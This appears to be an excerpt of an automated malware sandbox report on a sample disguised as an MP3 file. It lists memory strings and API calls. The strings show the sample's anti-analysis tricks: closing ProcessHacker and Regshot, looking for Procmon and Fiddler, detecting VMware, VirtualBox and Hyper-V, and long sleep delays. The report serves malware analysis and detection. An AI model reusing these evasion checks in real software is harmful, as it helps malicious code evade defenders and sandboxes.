Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE)_M
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213298133.00000000019A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217573693.00000000019A5000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215926455.00000000019A5000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213000386.0000000001994000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215658045.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214246439.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215081504.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")C
Source: qwlvpmrupf.mp3, 00000007.00000002.1953687346.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001066000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950281908.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947262131.000000000106A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1948261084.0000000001072000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1946884763.000000000105D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079423406.0000000001763000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2078136333.0000000001762000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXESEQ
Source: qwlvpmrupf.mp3, 00000007.00000002.1953687346.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001066000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950281908.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947262131.000000000106A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1948261084.0000000001072000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1946884763.000000000105D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079814695.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXEZ2
Source: qwlvpmrupf.mp3, 00000007.00000003.1947833274.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951093785.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1953739155.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294338025.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297587542.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294497605.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294338025.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2300827397.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294851662.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296379791.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297015354.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")F
Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES
Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ERE.EXEFIDDLER.EXEIDA.EX
Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079814695.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES2
Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE-
Source: qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES7
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294497605.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294338025.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2300827397.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294851662.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296379791.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297015354.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")Z
Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OCEXP64.EXETCPVIEW.EXETCPVIEW64.EXEPROCMON.EXE
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000008255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXEA
Source: qwlvpmrupf.mp3.exe, 00000010.00000002.2079423406.0000000001763000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2078136333.0000000001762000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076501420.0000000001756000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2078498674.0000000001763000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")O
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213103873.0000000001988000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215757310.000000000198A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216123247.000000000198D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENJ
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079472285.0000000001766000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076669694.0000000001765000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076501420.0000000001756000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENH
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213298133.00000000019A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213000386.0000000001994000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215658045.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214246439.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215081504.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")+
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 API coverage: 5.7 %
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe API coverage: 5.4 %
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe TID: 3300 Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe TID: 3300 Thread sleep count: 191 > 30
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe TID: 3300 Thread sleep count: 94 > 30
Source: C:\Windows\SysWOW64\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ngPebbPhbp.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B0F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00B0F826
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B21630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW, 0_2_00B21630
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 7_2_003DE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_003DD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_003DDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_003E9F9F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_003EA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EA488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 7_2_003EA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E65F1 FindFirstFileW,FindNextFileW,FindClose, 7_2_003E65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E7248 FindFirstFileW,FindClose, 7_2_003E7248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 7_2_003E72E9
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 16_2_00DFE387
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 16_2_00DFD836
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 16_2_00DFDB69
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E09F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 16_2_00E09F9F
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 16_2_00E0A0FA
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0A488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 16_2_00E0A488
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E065F1 FindFirstFileW,FindNextFileW,FindClose, 16_2_00E065F1
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 16_2_00E072E9
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E07248 FindFirstFileW,FindClose, 16_2_00E07248
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B24E14 VirtualQuery,GetSystemInfo, 0_2_00B24E14
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: qwlvpmrupf.mp3.exe, 00000012.00000002.2217353768.0000000001957000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2077633430.00000000017A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exeT=
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296334976.00000000013F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe5FB536C7
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Thenv
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2077633430.00000000017A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296334976.00000000013F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe(
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then_$
Source: ngPebbPhbp.exe, 00000000.00000003.1739308660.000000000354F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: OpenWith.exe, 0000000F.00000002.2945020852.0000000003528000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2945020852.00000000035A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe59767-q*
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296872419.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296756734.0000000001398000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297587542.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Then30|q
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001787000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076454608.000000000178D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076887703.0000000001790000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077612652.000000000179F000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077633430.00000000017A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exev
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2078297593.0000000001741000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079283835.0000000001741000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077795230.000000000173F000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077763537.0000000001737000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Thensw
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215199995.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215043797.00000000019DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe|
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") ThengC
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe3A765687Iq
Source: qwlvpmrupf.mp3, 00000007.00000003.1946884763.000000000105D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") ThenQy
Source: qwlvpmrupf.mp3, 00000007.00000003.1950739253.000000000104C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951848484.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952934549.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950894323.0000000001053000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") ThenP*&
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenp21"
Source: OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
